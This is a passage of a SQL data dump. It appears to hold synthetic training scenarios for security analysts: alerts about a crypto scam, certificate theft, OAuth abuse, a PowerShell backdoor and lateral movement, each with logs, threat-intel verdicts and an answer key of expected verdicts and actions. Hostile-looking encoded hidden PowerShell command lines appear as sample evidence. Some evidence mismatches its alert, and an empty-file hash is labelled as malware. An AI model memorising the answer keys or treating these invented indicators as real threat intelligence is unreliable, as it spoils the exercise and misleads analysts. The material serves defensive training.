Directory\",\"verdict\":\"suspicious\",\"details\":\"User account potentially compromised.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'beginner', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(879, 'Cryptocurrency Transfer Activity', 'high', 'Blockchain Analysis Tools', 'The attacker posted fraudulent messages from compromised accounts, directing followers to a Bitcoin wallet and successfully stealing $120,000 before detection.', 'Exfiltration', 'T1567 - Exfiltration Over Web Service', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T14:56:32Z\",\"event_id\":\"evt-crypto-004\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.101\",\"source_user\":\"compromised_user_01\",\"transaction_id\":\"tx1234567890\",\"bitcoin_wallet\":\"1A1zP1eP5QGefi2DMPTfTL5SLmv7DivfNa\",\"amount_usd\":120000,\"malicious_url\":\"http://malicious-site.com/bitcoin-scam\",\"file_hash\":\"5d41402abc4b2a76b9719d911017c592\",\"filename\":\"scam_guide.pdf\"}', '2026-01-15 00:55:54', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"IP Reputation Service\",\"verdict\":\"malicious\",\"details\":\"IP address associated with multiple fraudulent activities.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.101\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address.\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"compromised_user_01\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal User Directory\",\"verdict\":\"suspicious\",\"details\":\"User account compromised in phishing attack.\"}},{\"id\":\"artifact_4\",\"type\":\"url\",\"value\":\"http://malicious-site.com/bitcoin-scam\",\"is_critical\":true,\"osint_result\":{\"source\":\"URL Analysis Service\",\"verdict\":\"malicious\",\"details\":\"URL hosting Bitcoin scam content.\"}},{\"id\":\"artifact_5\",\"type\":\"hash\",\"value\":\"5d41402abc4b2a76b9719d911017c592\",\"is_critical\":false,\"osint_result\":{\"source\":\"File Analysis Service\",\"verdict\":\"suspicious\",\"details\":\"PDF 
file associated with scam instructions.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'beginner', 'DLP', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.549Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:56:32Z\\\",\\\"event_id\\\":\\\"evt-crypto-004\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.101\\\",\\\"source_user\\\":\\\"compromised_user_01\\\",\\\"transaction_id\\\":\\\"tx1234567890\\\",\\\"bitcoin_wallet\\\":\\\"1A1zP1eP5QGefi2DMPTfTL5SLmv7DivfNa\\\",\\\"amount_usd\\\":120000,\\\"malicious_url\\\":\\\"http://malicious-site.com/bitcoin-scam\\\",\\\"file_hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\",\\\"filename\\\":\\\"scam_guide.pdf\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.549Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:56:32Z\\\",\\\"event_id\\\":\\\"evt-crypto-004\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.101\\\",\\\"source_user\\\":\\\"compromised_user_01\\\",\\\"transaction_id\\\":\\\"tx1234567890\\\",\\\"bitcoin_wallet\\\":\\\"1A1zP1eP5QGefi2DMPTfTL5SLmv7DivfNa\\\",\\\"amount_usd\\\":120000,\\\"malicious_url\\\":\\\"http://malicious-site.com/bitcoin-scam\\\",\\\"file_hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\",\\\"filename\\\":\\\"scam_guide.pdf\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.549Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated 
event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:56:32Z\\\",\\\"event_id\\\":\\\"evt-crypto-004\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.101\\\",\\\"source_user\\\":\\\"compromised_user_01\\\",\\\"transaction_id\\\":\\\"tx1234567890\\\",\\\"bitcoin_wallet\\\":\\\"1A1zP1eP5QGefi2DMPTfTL5SLmv7DivfNa\\\",\\\"amount_usd\\\":120000,\\\"malicious_url\\\":\\\"http://malicious-site.com/bitcoin-scam\\\",\\\"file_hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\",\\\"filename\\\":\\\"scam_guide.pdf\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.549Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:56:32Z\\\",\\\"event_id\\\":\\\"evt-crypto-004\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.101\\\",\\\"source_user\\\":\\\"compromised_user_01\\\",\\\"transaction_id\\\":\\\"tx1234567890\\\",\\\"bitcoin_wallet\\\":\\\"1A1zP1eP5QGefi2DMPTfTL5SLmv7DivfNa\\\",\\\"amount_usd\\\":120000,\\\"malicious_url\\\":\\\"http://malicious-site.com/bitcoin-scam\\\",\\\"file_hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\",\\\"filename\\\":\\\"scam_guide.pdf\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.549Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:56:32Z\\\",\\\"event_id\\\":\\\"evt-crypto-004\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.101\\\",\\\"source_user\\\":\\\"compromised_user_01\\\",\\\"transaction_id\\\":\\\"tx1234567890\\\",\\\"bitcoin_wallet\\\":\\\"1A1zP1eP5QGefi2DMPTfTL5SLmv7DivfNa\\\",\\\"amount_usd\\\":120000,\\\"malicious_url\\\":\\\"http://malicious-site.com/bitcoin-scam\\\",\\\"file_hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\",\\\"filename\\\":\\\"scam_guide.pdf\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(880, 'Unauthorized Certificate Access Detected', 'high', 'Security Information and Event Management (SIEM)', 'An unauthorized access attempt was detected using a compromised certificate. APT29 is leveraging a stolen Mimecast certificate to gain initial access to Microsoft 365 environments, indicative of a supply chain attack vector.', 'Supply Chain Attack', 'T1195: Supply Chain Compromise', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:32:07Z\",\"event_id\":\"evt-20231015-001\",\"source_ip\":\"185.100.87.202\",\"destination_ip\":\"192.168.1.10\",\"certificate_serial\":\"04:92:48:7D:3A:5B:9C:1E:AC:91\",\"malware_hash\":\"e99a18c428cb38d5f260853678922e03\",\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36\",\"filename\":\"MimecastCert.pfx\",\"username\":\"j.doe@company.com\",\"event_type\":\"certificate_access\",\"log_message\":\"Unauthorized certificate access detected from IP 185.100.87.202 using compromised certificate to 192.168.1.10\"}', '2026-01-15 00:56:34', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"185.100.87.202\",\"is_critical\":true,\"osint_result\":{\"source\":\"ThreatIntelDB\",\"verdict\":\"malicious\",\"details\":\"IP associated with known APT29 activities\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal server IP\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Hash associated with certificate theft\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"MimecastCert.pfx\",\"is_critical\":true,\"osint_result\":{\"source\":\"File Reputation Service\",\"verdict\":\"suspicious\",\"details\":\"Filename linked to unauthorized access 
attempts\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"j.doe@company.com\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal User Directory\",\"verdict\":\"internal\",\"details\":\"Employee account potentially compromised\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'intermediate', 'TI', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.551Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:32:07Z\\\",\\\"event_id\\\":\\\"evt-20231015-001\\\",\\\"source_ip\\\":\\\"185.100.87.202\\\",\\\"destination_ip\\\":\\\"192.168.1.10\\\",\\\"certificate_serial\\\":\\\"04:92:48:7D:3A:5B:9C:1E:AC:91\\\",\\\"malware_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36\\\",\\\"filename\\\":\\\"MimecastCert.pfx\\\",\\\"username\\\":\\\"j.doe@company.com\\\",\\\"event_type\\\":\\\"certificate_access\\\",\\\"log_message\\\":\\\"Unauthorized certificate access detected from IP 185.100.87.202 using compromised certificate to 192.168.1.10\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.551Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 
1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:32:07Z\\\",\\\"event_id\\\":\\\"evt-20231015-001\\\",\\\"source_ip\\\":\\\"185.100.87.202\\\",\\\"destination_ip\\\":\\\"192.168.1.10\\\",\\\"certificate_serial\\\":\\\"04:92:48:7D:3A:5B:9C:1E:AC:91\\\",\\\"malware_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36\\\",\\\"filename\\\":\\\"MimecastCert.pfx\\\",\\\"username\\\":\\\"j.doe@company.com\\\",\\\"event_type\\\":\\\"certificate_access\\\",\\\"log_message\\\":\\\"Unauthorized certificate access detected from IP 185.100.87.202 using compromised certificate to 192.168.1.10\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.551Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:32:07Z\\\",\\\"event_id\\\":\\\"evt-20231015-001\\\",\\\"source_ip\\\":\\\"185.100.87.202\\\",\\\"destination_ip\\\":\\\"192.168.1.10\\\",\\\"certificate_serial\\\":\\\"04:92:48:7D:3A:5B:9C:1E:AC:91\\\",\\\"malware_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36\\\",\\\"filename\\\":\\\"MimecastCert.pfx\\\",\\\"username\\\":\\\"j.doe@company.com\\\",\\\"event_type\\\":\\\"certificate_access\\\",\\\"log_message\\\":\\\"Unauthorized certificate access detected from IP 185.100.87.202 using compromised certificate to 192.168.1.10\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.551Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 
3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:32:07Z\\\",\\\"event_id\\\":\\\"evt-20231015-001\\\",\\\"source_ip\\\":\\\"185.100.87.202\\\",\\\"destination_ip\\\":\\\"192.168.1.10\\\",\\\"certificate_serial\\\":\\\"04:92:48:7D:3A:5B:9C:1E:AC:91\\\",\\\"malware_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36\\\",\\\"filename\\\":\\\"MimecastCert.pfx\\\",\\\"username\\\":\\\"j.doe@company.com\\\",\\\"event_type\\\":\\\"certificate_access\\\",\\\"log_message\\\":\\\"Unauthorized certificate access detected from IP 185.100.87.202 using compromised certificate to 192.168.1.10\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.551Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:32:07Z\\\",\\\"event_id\\\":\\\"evt-20231015-001\\\",\\\"source_ip\\\":\\\"185.100.87.202\\\",\\\"destination_ip\\\":\\\"192.168.1.10\\\",\\\"certificate_serial\\\":\\\"04:92:48:7D:3A:5B:9C:1E:AC:91\\\",\\\"malware_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36\\\",\\\"filename\\\":\\\"MimecastCert.pfx\\\",\\\"username\\\":\\\"j.doe@company.com\\\",\\\"event_type\\\":\\\"certificate_access\\\",\\\"log_message\\\":\\\"Unauthorized certificate access detected from IP 185.100.87.202 using compromised certificate to 192.168.1.10\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/auth.log\\\" | head 100\"}}', 0),
(881, 'Suspicious OAuth Token Requests', 'high', 'Cloud Access Security Broker (CASB)', 'APT29 has been observed abusing OAuth tokens to escalate privileges within the cloud infrastructure. This activity was detected following an initial access, indicating potential persistence strategies by the threat actor.', 'Cloud Exploitation', 'T1550.001 - Use Alternate Authentication Material: Application Access Token', 1, 'new', NULL, '{\"event_time\":\"2023-10-12T14:32:00Z\",\"source_ip\":\"203.0.113.45\",\"internal_ip\":\"192.168.1.101\",\"user\":\"jdoe@corp.com\",\"action\":\"OAuth Token Request\",\"service_name\":\"Company Cloud Service\",\"token_id\":\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\",\"token_status\":\"active\",\"detected_by\":\"CASB\",\"description\":\"OAuth token request from an external IP associated with known APT activity.\",\"related_filename\":\"malicious_payload.exe\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\"}', '2026-01-15 00:56:34', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"IP associated with APT29 activity.\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"jdoe@corp.com\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"internal\",\"details\":\"Corporate user potentially compromised.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with known payload.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True 
Positive\",\"expected_actions\":[\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'intermediate', 'TI', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.552Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"event_time\\\":\\\"2023-10-12T14:32:00Z\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.101\\\",\\\"user\\\":\\\"jdoe@corp.com\\\",\\\"action\\\":\\\"OAuth Token Request\\\",\\\"service_name\\\":\\\"Company Cloud Service\\\",\\\"token_id\\\":\\\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\\\",\\\"token_status\\\":\\\"active\\\",\\\"detected_by\\\":\\\"CASB\\\",\\\"description\\\":\\\"OAuth token request from an external IP associated with known APT activity.\\\",\\\"related_filename\\\":\\\"malicious_payload.exe\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.552Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"event_time\\\":\\\"2023-10-12T14:32:00Z\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.101\\\",\\\"user\\\":\\\"jdoe@corp.com\\\",\\\"action\\\":\\\"OAuth Token Request\\\",\\\"service_name\\\":\\\"Company Cloud Service\\\",\\\"token_id\\\":\\\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\\\",\\\"token_status\\\":\\\"active\\\",\\\"detected_by\\\":\\\"CASB\\\",\\\"description\\\":\\\"OAuth token request from an external IP associated with known APT 
activity.\\\",\\\"related_filename\\\":\\\"malicious_payload.exe\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.552Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"event_time\\\":\\\"2023-10-12T14:32:00Z\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.101\\\",\\\"user\\\":\\\"jdoe@corp.com\\\",\\\"action\\\":\\\"OAuth Token Request\\\",\\\"service_name\\\":\\\"Company Cloud Service\\\",\\\"token_id\\\":\\\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\\\",\\\"token_status\\\":\\\"active\\\",\\\"detected_by\\\":\\\"CASB\\\",\\\"description\\\":\\\"OAuth token request from an external IP associated with known APT activity.\\\",\\\"related_filename\\\":\\\"malicious_payload.exe\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.552Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"event_time\\\":\\\"2023-10-12T14:32:00Z\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.101\\\",\\\"user\\\":\\\"jdoe@corp.com\\\",\\\"action\\\":\\\"OAuth Token Request\\\",\\\"service_name\\\":\\\"Company Cloud Service\\\",\\\"token_id\\\":\\\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\\\",\\\"token_status\\\":\\\"active\\\",\\\"detected_by\\\":\\\"CASB\\\",\\\"description\\\":\\\"OAuth token request from an external IP associated with known APT 
activity.\\\",\\\"related_filename\\\":\\\"malicious_payload.exe\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.552Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"event_time\\\":\\\"2023-10-12T14:32:00Z\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.101\\\",\\\"user\\\":\\\"jdoe@corp.com\\\",\\\"action\\\":\\\"OAuth Token Request\\\",\\\"service_name\\\":\\\"Company Cloud Service\\\",\\\"token_id\\\":\\\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\\\",\\\"token_status\\\":\\\"active\\\",\\\"detected_by\\\":\\\"CASB\\\",\\\"description\\\":\\\"OAuth token request from an external IP associated with known APT activity.\\\",\\\"related_filename\\\":\\\"malicious_payload.exe\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/auth.log\\\" | head 100\"}}', 0),
(882, 'Persistent Backdoor Installation Detected', 'high', 'Endpoint Detection and Response (EDR)', 'APT29 has installed a backdoor on host 192.168.1.101 using obfuscated techniques to maintain access. This is part of a larger operation to compromise the environment.', 'Persistence', 'T1059.001 - PowerShell', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:23:34Z\",\"event_type\":\"process_creation\",\"host_ip\":\"192.168.1.101\",\"attacker_ip\":\"203.0.113.5\",\"process_name\":\"powershell.exe\",\"command_line\":\"powershell.exe -nop -w hidden -enc SGVsbG8gd29ybGQ=\",\"file_path\":\"C:\\\\Windows\\\\System32\\\\powershell.exe\",\"username\":\"jdoe\",\"hash\":\"3a1e2f1d2b4c5e6f7a8b9c0d1e2f3a4b\",\"malware_filename\":\"backdoor_ap29.dll\",\"event_id\":\"4624\",\"source_ip\":\"203.0.113.5\"}', '2026-01-15 00:56:34', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.101\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal_network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the compromised host.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.5\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat_intel\",\"verdict\":\"malicious\",\"details\":\"Known APT29 command and control server.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"3a1e2f1d2b4c5e6f7a8b9c0d1e2f3a4b\",\"is_critical\":true,\"osint_result\":{\"source\":\"virus_total\",\"verdict\":\"malicious\",\"details\":\"Hash associated with APT29 backdoor activities.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"backdoor_ap29.dll\",\"is_critical\":true,\"osint_result\":{\"source\":\"malware_analysis\",\"verdict\":\"malicious\",\"details\":\"Filename used by APT29 for persistence.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal_directory\",\"verdict\":\"clean\",\"details\":\"Legitimate user 
account compromised for persistence.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'intermediate', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(883, 'Unusual Lateral Movement Activity', 'high', 'Network Monitoring Tools', 'Detected lateral movement within the network. Anomalous activity observed from internal host attempting unauthorized access to multiple systems. Indicators suggest potential APT29 involvement leveraging known TTPs.', 'Lateral Movement', 'T1078 - Valid Accounts', 1, 'new', NULL, '{\"timestamp\":\"2023-10-18T14:23:45Z\",\"event_id\":\"1001\",\"source_ip\":\"192.168.1.25\",\"destination_ip\":\"10.0.0.15\",\"user\":\"jdoe\",\"action\":\"login_attempt\",\"status\":\"failed\",\"external_attacker_ip\":\"203.0.113.45\",\"malware_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"malware_filename\":\"APT29_tool.exe\",\"protocol\":\"SMB\",\"message\":\"Anomalous login attempt detected from host 192.168.1.25 to 10.0.0.15; potential lateral movement suspected.\"}', '2026-01-15 00:56:34', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.25\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Internal IP involved in lateral movement.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"external threat intelligence\",\"verdict\":\"malicious\",\"details\":\"IP associated with known APT29 activity.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"malware database\",\"verdict\":\"malicious\",\"details\":\"Hash corresponds to known APT29 malware.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"APT29_tool.exe\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"suspicious\",\"details\":\"Filename resembles known APT29 tool.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True 
